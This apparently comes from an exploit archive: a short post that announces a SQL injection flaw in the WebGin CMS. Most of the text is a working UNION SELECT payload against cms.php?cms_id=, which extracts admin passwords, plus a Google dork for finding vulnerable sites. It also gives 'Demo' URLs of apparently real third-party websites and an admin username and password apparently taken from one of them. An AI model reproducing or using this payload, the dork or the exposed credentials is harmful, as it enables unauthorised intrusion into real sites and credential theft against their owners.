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WebGin SQL Injection Vulnerability
# Title: Powered by WebGin SQL Injection Vulnerability # Google Dork: Powered by WebGin /- Or/ inurl:Powered by WebGin # ft7@hotmail.com # Author: Hacker alajman # software:Powered by WebGin # Software: Link: http://www.webgin.it/ #Version: ###################################################### Powered by WebGin SQL Injection Vulnerability cms.php?cms_id= http://www.site.com/folder/cms.php?cms_id=-999999.9 union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(tbl_energyca_admin.adminPword as char))),0x27,0x7e) from `Sql351573_1`.tbl_energyca_admin Order by adminName limit 0,1) ,0x31303235343830303536,0x31303235343830303536-- -999999.9 union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(tbl_energyca_admin.adminPword as char))),0x27,0x7e) from `Sql351573_1`.tbl_energyca_admin Order by adminName limit 0,1) ,0x31303235343830303536,0x31303235343830303536-- Demo http://www.energyca.it/cms.php?cms_id=-999999.9 union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(tbl_energyca_admin.adminPword as char))),0x27,0x7e) from `Sql351573_1`.tbl_energyca_admin Order by adminName limit 0,1) ,0x31303235343830303536,0x31303235343830303536-- Username: EnYadmin10 Password: 1025480056 http://www.working-process.com/cms.php?cms_id=-999999.9 union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(tbl_energyca_admin.adminPword as char))),0x27,0x7e) from `Sql351573_1`.tbl_energyca_admin Order by adminName limit 0,1) ,0x31303235343830303536,0x31303235343830303536-- http://www.working-process.com/cms.php?cms_id=' ######################## #########Greetz: Hacker alajman / AnGer Hacker / G-B /RAB3OUN/######### # 0day.today [2024-12-27] #